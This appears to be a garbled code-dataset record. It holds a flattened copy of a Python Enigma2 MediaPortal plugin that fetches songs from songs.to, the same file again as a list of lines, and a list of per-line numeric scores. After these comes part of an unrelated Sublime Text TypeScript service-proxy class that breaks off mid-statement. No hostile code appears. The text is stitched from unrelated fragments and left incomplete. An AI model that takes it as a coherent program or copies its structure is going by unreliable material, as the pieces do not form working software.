headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scData).addErrback(self.dataError) def scData(self, data): data = data.replace('"cover":null','"cover":"",') findSongs = re.findall('"hash":"(.*?)","title":"(.*?)","artist":"(.*?)","album":"(.*?)".*?"cover":"(.*?)"', data, re.S) if findSongs: for (scHash,scTitle,scArtist,scAlbum,scCover) in findSongs: self.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist), scAlbum, scCover, scHash)) if len(self.streamList) == 0: self.streamList.append((_("No songs found!"), None, None, None, None)) self.ml.setList(map(self.songsto_playlist, self.streamList)) self.keyLocked = False def keyOK(self): if self.keyLocked: return if self['liste'].getCurrent()[0][1] == None: return idx = self['liste'].getSelectedIndex() self.session.open(SongstoPlayer, self.streamList, 'songstoall', int(idx), self.scGuiName) class showSongstoTop(MPScreen): def __init__(self, session, link, name): self.scLink = link self.scGuiName = name self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel" : self.keyCancel }, -1) self["title"] = Label("Songs.to Music Player") self['ContentTitle'] = Label(self.scGuiName) self['name'] = Label(_("Selection:")) self.streamList = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.keyLocked = False self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.keyLocked = True getPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataGet).addErrback(self.dataError) def scDataGet(self, data): findSongs = re.findall('name1":"(.*?)","name2":"(.*?)"', data, re.S) if findSongs: for (scArtist, scTitle) in findSongs: self.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist))) if len(self.streamList) == 0: self.streamList.append((_("No songs found!"), None)) self.ml.setList(map(self.songsto_playlist, self.streamList)) self.keyLocked = False def scDataPost(self, data): self.keyLocked = False if self.artist == '': title = self.album else: title = self.artist + ' - ' + self.album self.session.open(showSongstoAll, data, title) def keyOK(self): if self.keyLocked: return if self['liste'].getCurrent()[0][1] == None: return if "album" in self.scLink: self.keyLocked = True self.artist = self['liste'].getCurrent()[0][1] self.album = self['liste'].getCurrent()[0][0] url = "http://songs.to/json/songlist.php?quickplay=1" dataPost = "data=%7B%22data%22%3A%5B%7B%22artist%22%3A%22"+self.artist+"%22%2C%20%22album%22%3A%22"+self.album+"%22%2C%20%22title%22%3A%22%22%7D%5D%7D" getPage(url, method='POST', postdata=dataPost, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataPost).addErrback(self.dataError) else: idx = self['liste'].getSelectedIndex() self.session.open(SongstoPlayer, self.streamList, 'songstotop', int(idx), self.scGuiName) class songstoPlaylist(SimplePlaylist): def playListEntry(self, entry): if entry[1] == '': title = entry[0] else: title = entry[1] + ' - ' + entry[0] width = self['liste'].instance.size().width() height = self['liste'].l.getItemSize().height() self.ml.l.setFont(0, gFont('mediaportal', height - 2 * mp_globals.sizefactor)) res = [entry] res.append((eListboxPythonMultiContent.TYPE_TEXT, 0, 0, width, height, 0, RT_HALIGN_LEFT | RT_VALIGN_CENTER, title)) return res class SongstoPlayer(SimplePlayer): def __init__(self, session, playList, songsto_type, playIdx=0, listTitle=None): self.songsto_type = songsto_type SimplePlayer.__init__(self, session, playList, playIdx=playIdx, playAll=True, listTitle=listTitle, ltype='songsto', cover=True, autoScrSaver=True) def getVideo(self): sc_artist = self.playList[self.playIdx][1] sc_title = self.playList[self.playIdx][self.title_inr] if self.songsto_type == 'songstotop': sc_album = '' token = '' imgurl = '' else: sc_album = self.playList[self.playIdx][2] token = self.playList[self.playIdx][4] imgurl = self.playList[self.playIdx][3] imgurl = "http://songs.to/covers/"+imgurl SongstoLink(self.session).getLink(self.playStream, self.dataError, sc_title, sc_artist, sc_album, token, imgurl) def openPlaylist(self, pl_class=songstoPlaylist): SimplePlayer.openPlaylist(self, pl_class)
[ "# -*- coding: utf-8 -*-\n", "from Plugins.Extensions.MediaPortal.plugin import _\n", "from Plugins.Extensions.MediaPortal.resources.imports import *\n", "from Plugins.Extensions.MediaPortal.resources.keyboardext import VirtualKeyBoardExt\n", "from Plugins.Extensions.MediaPortal.resources.songstolink import SongstoLink\n", "from Plugins.Extensions.MediaPortal.resources.simpleplayer import SimplePlayer, SimplePlaylist\n", "\n", "class showSongstoGenre(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\r\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself.baseurl = 'http://songs.to/json/songlist.php?'\n", "\n", "\t\tself[\"title\"] = Label(\"Songs.to Music Player\")\n", "\t\tself['ContentTitle'] = Label('Music Tops')\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\n", "\t\tself.genreliste = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.keyLocked = False\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.keyLocked = True\n", "\t\turl = \"http://s.songs.to/js/data-en.js\"\n", "\t\tgetPage(url).addCallback(self.genreData).addErrback(self.dataError)\n", "\n", "\tdef genreData(self, data):\n", "\t\tpreparse = re.search('chart_types={(.*?)}', data, re.S).groups()\n", "\t\tif preparse:\n", "\t\t\tparse = re.findall(\"(music.*?):\\\\'(.*?)\\\\'\", preparse[0], re.S)\n", "\t\tif parse:\n", "\t\t\tfor (scUrl, scName) in parse:\n", "\t\t\t\tself.genreliste.append((scName, \"charts=\"+scUrl))\n", "\t\t\tself.genreliste.insert(0, (\"Songs Top 500\", \"top=all\"))\n", "\t\t\tself.genreliste.insert(0, (\"Search Album\", \"&col=album\"))\n", "\t\t\tself.genreliste.insert(0, (\"Search Title\", \"&col=title\"))\n", "\t\t\tself.genreliste.insert(0, (\"Search Artist\", \"&col=artist\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tscName = self['liste'].getCurrent()[0][0]\n", "\t\tscUrl = self['liste'].getCurrent()[0][1]\n", "\t\tif scName == \"Songs Top 500\":\n", "\t\t\tscUrl = self.baseurl + scUrl\n", "\t\t\tself.session.open(showSongstoAll, scUrl, scName)\n", "\t\telif re.match('Search.*?', scName):\n", "\t\t\tself.suchtitel = scName\n", "\t\t\tself.suchmodus = scUrl\n", "\t\t\tself.session.openWithCallback(self.searchCallback, VirtualKeyBoardExt, title = (self.suchtitel), text = \"\", is_dialog=True)\n", "\t\telse:\n", "\t\t\tscUrl = self.baseurl + scUrl\n", "\t\t\tself.session.open(showSongstoTop, scUrl, scName)\n", "\n", "\tdef searchCallback(self, callbackStr):\n", "\t\tif callbackStr is not None:\n", "\t\t\tself.suchString = callbackStr.replace(' ', '%20')\n", "\t\t\tscUrl = self.baseurl + \"keyword=\" + self.suchString + self.suchmodus\n", "\t\t\tscName = self.suchtitel + \": \" + callbackStr\n", "\t\t\tself.session.open(showSongstoAll, scUrl, scName)\n", "\n", "class showSongstoAll(MPScreen):\n", "\n", "\tdef __init__(self, session, link, name):\n", "\t\tself.scLink = link\n", "\t\tself.scGuiName = name\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\r\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\" : self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself[\"title\"] = Label(\"Songs.to Music Player\")\n", "\t\tself['ContentTitle'] = Label(self.scGuiName)\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\n", "\t\tself.streamList = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.keyLocked = False\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.keyLocked = True\n", "\t\tif self.scGuiName != \"Songs Top 500\" and not re.match('Search.*?', self.scGuiName):\n", "\t\t\tself.scData(self.scLink)\n", "\t\telse:\n", "\t\t\tgetPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scData).addErrback(self.dataError)\n", "\n", "\tdef scData(self, data):\n", "\t\tdata = data.replace('\"cover\":null','\"cover\":\"\",')\n", "\t\tfindSongs = re.findall('\"hash\":\"(.*?)\",\"title\":\"(.*?)\",\"artist\":\"(.*?)\",\"album\":\"(.*?)\".*?\"cover\":\"(.*?)\"', data, re.S)\n", "\t\tif findSongs:\n", "\t\t\tfor (scHash,scTitle,scArtist,scAlbum,scCover) in findSongs:\n", "\t\t\t\tself.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist), scAlbum, scCover, scHash))\n", "\t\tif len(self.streamList) == 0:\n", "\t\t\tself.streamList.append((_(\"No songs found!\"), None, None, None, None))\n", "\t\tself.ml.setList(map(self.songsto_playlist, self.streamList))\n", "\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tif self['liste'].getCurrent()[0][1] == None:\n", "\t\t\treturn\n", "\t\tidx = self['liste'].getSelectedIndex()\n", "\t\tself.session.open(SongstoPlayer, self.streamList, 'songstoall', int(idx), self.scGuiName)\n", "\n", "class showSongstoTop(MPScreen):\n", "\n", "\tdef __init__(self, session, link, name):\n", "\t\tself.scLink = link\n", "\t\tself.scGuiName = name\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\r\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\" : self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself[\"title\"] = Label(\"Songs.to Music Player\")\n", "\t\tself['ContentTitle'] = Label(self.scGuiName)\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\n", "\t\tself.streamList = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.keyLocked = False\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.keyLocked = True\n", "\t\tgetPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataGet).addErrback(self.dataError)\n", "\n", "\tdef scDataGet(self, data):\n", "\t\tfindSongs = re.findall('name1\":\"(.*?)\",\"name2\":\"(.*?)\"', data, re.S)\n", "\t\tif findSongs:\n", "\t\t\tfor (scArtist, scTitle) in findSongs:\n", "\t\t\t\tself.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist)))\n", "\t\tif len(self.streamList) == 0:\n", "\t\t\tself.streamList.append((_(\"No songs found!\"), None))\n", "\t\tself.ml.setList(map(self.songsto_playlist, self.streamList))\n", "\t\tself.keyLocked = False\n", "\n", "\tdef scDataPost(self, data):\n", "\t\tself.keyLocked = False\n", "\t\tif self.artist == '':\n", "\t\t\ttitle = self.album\n", "\t\telse:\n", "\t\t\ttitle = self.artist + ' - ' + self.album\n", "\t\tself.session.open(showSongstoAll, data, title)\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tif self['liste'].getCurrent()[0][1] == None:\n", "\t\t\treturn\n", "\t\tif \"album\" in self.scLink:\n", "\t\t\tself.keyLocked = True\n", "\t\t\tself.artist = self['liste'].getCurrent()[0][1]\n", "\t\t\tself.album = self['liste'].getCurrent()[0][0]\n", "\t\t\turl = \"http://songs.to/json/songlist.php?quickplay=1\"\n", "\t\t\tdataPost = \"data=%7B%22data%22%3A%5B%7B%22artist%22%3A%22\"+self.artist+\"%22%2C%20%22album%22%3A%22\"+self.album+\"%22%2C%20%22title%22%3A%22%22%7D%5D%7D\"\n", "\t\t\tgetPage(url, method='POST', postdata=dataPost, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataPost).addErrback(self.dataError)\n", "\t\telse:\n", "\t\t\tidx = self['liste'].getSelectedIndex()\n", "\t\t\tself.session.open(SongstoPlayer, self.streamList, 'songstotop', int(idx), self.scGuiName)\n", "\n", "class songstoPlaylist(SimplePlaylist):\n", "\n", "\tdef playListEntry(self, entry):\n", "\t\tif entry[1] == '':\n", "\t\t\ttitle = entry[0]\n", "\t\telse:\n", "\t\t\ttitle = entry[1] + ' - ' + entry[0]\n", "\t\twidth = self['liste'].instance.size().width()\n", "\t\theight = self['liste'].l.getItemSize().height()\n", "\t\tself.ml.l.setFont(0, gFont('mediaportal', height - 2 * mp_globals.sizefactor))\n", "\t\tres = [entry]\n", "\t\tres.append((eListboxPythonMultiContent.TYPE_TEXT, 0, 0, width, height, 0, RT_HALIGN_LEFT | RT_VALIGN_CENTER, title))\n", "\t\treturn res\n", "\n", "class SongstoPlayer(SimplePlayer):\n", "\n", "\tdef __init__(self, session, playList, songsto_type, playIdx=0, listTitle=None):\n", "\t\tself.songsto_type = songsto_type\n", "\n", "\t\tSimplePlayer.__init__(self, session, playList, playIdx=playIdx, playAll=True, listTitle=listTitle, ltype='songsto', cover=True, autoScrSaver=True)\n", "\n", "\tdef getVideo(self):\n", "\t\tsc_artist = self.playList[self.playIdx][1]\n", "\t\tsc_title = self.playList[self.playIdx][self.title_inr]\n", "\t\tif self.songsto_type == 'songstotop':\n", "\t\t\tsc_album = ''\n", "\t\t\ttoken = ''\n", "\t\t\timgurl = ''\n", "\t\telse:\n", "\t\t\tsc_album = self.playList[self.playIdx][2]\n", "\t\t\ttoken = self.playList[self.playIdx][4]\n", "\t\t\timgurl = self.playList[self.playIdx][3]\n", "\t\t\timgurl = \"http://songs.to/covers/\"+imgurl\n", "\n", "\t\tSongstoLink(self.session).getLink(self.playStream, self.dataError, sc_title, sc_artist, sc_album, token, imgurl)\n", "\n", "\tdef openPlaylist(self, pl_class=songstoPlaylist):\n", "\t\tSimplePlayer.openPlaylist(self, pl_class)" ]
[ 0, 0, 0, 0.011904761904761904, 0, 0.010526315789473684, 0, 0.029411764705882353, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0, 0, 0.041666666666666664, 0.08, 0.08, 0.03571428571428571, 0.1111111111111111, 0, 0.018518518518518517, 0, 0.02040816326530612, 0.022222222222222223, 0.025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.04, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.023809523809523808, 0.014285714285714285, 0, 0.03571428571428571, 0.014925373134328358, 0.06666666666666667, 0.014925373134328358, 0.08333333333333333, 0.030303030303030304, 0.018518518518518517, 0.01694915254237288, 0.01639344262295082, 0.01639344262295082, 0.015873015873015872, 0.015151515151515152, 0.038461538461538464, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.022727272727272728, 0.023255813953488372, 0.03125, 0.03125, 0.019230769230769232, 0.02631578947368421, 0.037037037037037035, 0.038461538461538464, 0.047244094488188976, 0.125, 0.03125, 0.019230769230769232, 0, 0.025, 0.03333333333333333, 0.018867924528301886, 0.013888888888888888, 0.020833333333333332, 0.019230769230769232, 0, 0.03125, 0, 0.023809523809523808, 0.047619047619047616, 0.041666666666666664, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0, 0, 0.041666666666666664, 0.08, 0.09090909090909091, 0.06896551724137931, 0.1111111111111111, 0, 0.02040816326530612, 0.02127659574468085, 0.025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.04, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.023255813953488372, 0.03571428571428571, 0.125, 0.021739130434782608, 0, 0.04, 0.038461538461538464, 0.01639344262295082, 0.0625, 0.07936507936507936, 0.02040816326530612, 0.03125, 0.013513513513513514, 0.015873015873015872, 0.04, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.0425531914893617, 0.1, 0.024390243902439025, 0.021739130434782608, 0, 0.03125, 0, 0.023809523809523808, 0.047619047619047616, 0.041666666666666664, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0, 0, 0.041666666666666664, 0.08, 0.09090909090909091, 0.06896551724137931, 0.1111111111111111, 0, 0.02040816326530612, 0.02127659574468085, 0.025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.04, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.02142857142857143, 0, 0.03571428571428571, 0.014084507042253521, 0.0625, 0.024390243902439025, 0.013888888888888888, 0.03125, 0.017857142857142856, 0.015873015873015872, 0.04, 0, 0.034482758620689655, 0.04, 0.041666666666666664, 0.045454545454545456, 0.125, 0.022727272727272728, 0.02040816326530612, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.0425531914893617, 0.1, 0.034482758620689655, 0.04, 0.02, 0.02040816326530612, 0.017543859649122806, 0.012903225806451613, 0.017857142857142856, 0.125, 0.023809523809523808, 0.021505376344086023, 0, 0.02564102564102564, 0, 0.030303030303030304, 0.047619047619047616, 0.05, 0.125, 0.02564102564102564, 0.020833333333333332, 0.02, 0.024691358024691357, 0.0625, 0.01680672268907563, 0.07692307692307693, 0, 0.02857142857142857, 0, 0.024691358024691357, 0.02857142857142857, 0, 0.013422818791946308, 0, 0.047619047619047616, 0.022222222222222223, 0.017543859649122806, 0.025, 0.058823529411764705, 0.07142857142857142, 0.06666666666666667, 0.125, 0.022222222222222223, 0.023809523809523808, 0.023255813953488372, 0.022222222222222223, 0, 0.017391304347826087, 0, 0.0196078431372549, 0.046511627906976744 ]
250
0.031729
false
import sublime from . import json_helpers from .global_vars import IS_ST2 from .node_client import CommClient from .text_helpers import Location class ServiceProxy: def __init__(self, worker_client=CommClient(), server_client=CommClient()): self.__comm = server_client self.__worker_comm = worker_client self.seq = 1 def increase_seq(self): temp = self.seq self.seq += 1 return temp def exit(self): req_dict = self.create_req_dict("exit") json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def stop_worker(self): req_dict = self.create_req_dict("exit") json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def configure(self, host_info="Sublime Text", file=None, format_options=None): args = {"hostInfo": host_info, "formatOptions": format_options, "file": file} req_dict = self.create_req_dict("configure", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) self.set_inferred_project_compiler_options() def set_inferred_project_compiler_options(self): """ Add full type support for compilers running in file scope mode """ compiler_options = { "target": "ESNext", # enable all es-next features "allowJs": True, # enable javascript support "jsx": "Preserve", # enable jsx support "noEmit": True # do not emit outputs } args = { "options": compiler_options } req_dict = self.create_req_dict("compilerOptionsForInferredProjects", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def change(self, path, begin_location=Location(1, 1), end_location=Location(1, 1), insertString=""): args = { "file": path, "line": begin_location.line, "offset": begin_location.offset, "endLine": end_location.line, "endOffset": end_location.offset, "insertString": insertString } req_dict = self.create_req_dict("change", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def completions(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("completions", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmd( json_str, lambda response_dict: None if on_completed is None else on_completed(response_dict), req_dict["seq"] ) def async_completions(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("completions", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("signatureHelp", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmd( json_str, lambda response_dict: None if on_completed is None else on_completed(response_dict), req_dict["seq"] ) def async_signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("signatureHelp", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def definition(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("definition", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def type_definition(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("typeDefinition", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def format(self, path, begin_location=Location(1, 1), end_location=Location(1, 1)): args = { "file": path, "line": begin_location.line, "offset": begin_location.offset, "endLine": end_location.line, "endOffset": end_location.offset } req_dict = self.create_req_dict("format", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def format_on_key(self, path, location=Location(1, 1), key=""): args = {"file": path, "line": location.line, "offset": location.offset, "key": key} req_dict = self.create_req_dict("formatonkey", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def organize_imports(self, path): args = { "scope": { "type": "file", "args": { "file": path } }, } req_dict = self.create_req_dict("organizeImports", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def open(self, path): args = {"file": path} req_dict = self.create_req_dict("open", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def open_on_worker(self, path): args = {"file": path} req_dict = self.create_req_dict("open", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def close(self, path): args = {"file": path} req_dict = self.create_req_dict("close", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def references(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("references", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def reload(self, path, alternate_path): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def reload_on_worker(self, path, alternate_path): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): response_dict = self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def reload_async(self, path, alternate_path, on_completed): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"]) def reload_async_on_worker(self, path, alternate_path, on_completed): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"]) def rename(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("rename", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def get_applicable_refactors_async(self, path, start_loc, end_loc, on_completed): args = { "file": path, "startLine": start_loc.line, "startOffset": start_loc.offset, "endLine": end_loc.line, "endOffset": end_loc.offset, } req_dict = self.create_req_dict("getApplicableRefactors", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def get_edits_for_refactor_async(self, path, refactor_name, action_name, start_loc, end_loc, on_completed): args = { "file": path, "startLine": start_loc.line, "startOffset": start_loc.offset, "endLine": end_loc.line, "endOffset": end_loc.offset, "refactor": refactor_name, "action": action_name, } req_dict = self.create_req_dict("getEditsForRefactor", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) #on_completed(response_dict) #return response_dict def request_get_err(self, delay=0, pathList=[]): args = {"files": pathList, "delay": delay} req_dict = self.create_req_dict("geterr", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) def request_get_err_for_project(self, delay=0, path=""): args = {"file": path, "delay": delay} req_dict = self.create_req_dict("geterrForProject", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def type(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("type", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def quick_info(self, path, location=Location(1, 1), on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("quickinfo", args) json_str = json_helpers.encode(req_dict) callback = on_completed or (lambda: None) if not IS_ST2: self.__comm.sendCmdAsync( json_str, callback, req_dict["seq"] ) else: self.__comm.sendCmd( json_str, callback, req_dict["seq"] ) def quick_info_full(self, path, location=Location(1, 1), on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("quickinfo-full", args) json_str = json_helpers.encode(req_dict) callback = on_completed or (lambda: None) if not IS_ST2: self.__comm.sendCmdAsync( json_str, callback, req_dict["seq"] ) else: self.__comm.sendCmd( json_str, callback, req_dict["seq"] ) def save_to(self, path, alternatePath): args = {"file": path, "tmpfile": alternatePath} req_dict = self.create_req_dict("saveto", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) def nav_to(self, search_text, file_name): args = {"searchValue": search_text, "file": file_name, "maxResultCount": 20} req_dict = self.create_req_dict("navto", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def project_info(self, file_name, need_file_name_list=False): args = {"file": file_name, "needFileNameList": need_file_name_list} req_dict = self.create_req_dict("projectInfo", args) json_str = json_helpers.encode(req_dict) return self.__comm.sendCmdSync(json_str, req_dict["seq"]) def async_document_highlights(self, path, location, on_completed=None): args = {"line": location.line, "offset": location.offset, "file": path, "filesToSearch": [path]} req_dict = 